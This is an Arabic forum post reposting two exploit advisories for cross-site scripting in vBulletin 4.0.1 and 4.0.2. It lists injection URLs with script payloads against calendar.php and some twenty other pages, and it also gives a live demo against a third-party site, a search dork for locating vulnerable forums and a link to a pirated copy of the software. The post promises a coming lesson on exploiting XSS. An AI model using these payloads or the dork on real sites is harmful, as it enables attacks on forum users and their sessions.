بسم الله الرحمن الرحيم
الحمدلله والصلاة والسلام على رسول الله وعلى آله وصحبه أجمعين
السلام عليكم ورحمة الله وبركاته
اليكم التغرات
كود PHP:
===================================
vBulletin v 4.0.1 XSS Vulnerability
===================================
[+] Script: vBulletin Version 4.0.1
[+] Vendor: www.vbulletin.com
[+] Author: W4n73d
[~] Bug: Cross Site Scripting (XSS)
[~] Exploit: http://[HOST]/forum/calendar.php="***************("! XSS
!");</script>
[~] Demo: http://www.overbr.com.br/forum/calendar.php="***************("! XSS
!");</script>
# Inj3ct0r.com [2010-02-15]
كود PHP:
==========================================
vBulletin Version 4.0.2 Xss Vulnerability
==========================================
========================================================================================
| # Title : vBulletin Version 4.0.2 Cross Site Scripting in URI Vulnerability
| # Author : indoushka
| # Web Site : http://www.digzip.com/files/54QE0JXS/vbulletin_4.0.2nulledfinal.rar
| # Dork : Powered by vBulletin? Version 4.0.2
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)
| # Bug : XSS
====================== Exploit By indoushka =================================
# Exploit :
http://127.0.0.1/upload/calendar.php?acuparam=>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/faq.php?acuparam=>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/forum.php?acuparam=>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/usercp.php/>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/subscription.php?acuparam=>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/showthread.php?acuparam=>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/showgroups.php/>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/sendmessage.php/>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/search.php/>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/register.php?acuparam=>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/profile.php?acuparam=>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/private.php?acuparam=>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/online.php/>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/newthread.php?acuparam=>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/misc.php/>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/memberlist.php?=>"'>***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/member.php/>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/inlinemod.php?acuparam=>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/index.php/>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/forumdisplay.php?acuparam=>">***************(213771818860)</ScRiPt>
# Inj3ct0r.com [2010-02-20]
قريبا درس استغلال تغرات Xss
jyvjdk td lkj]dhj hgksom vb 4>0>x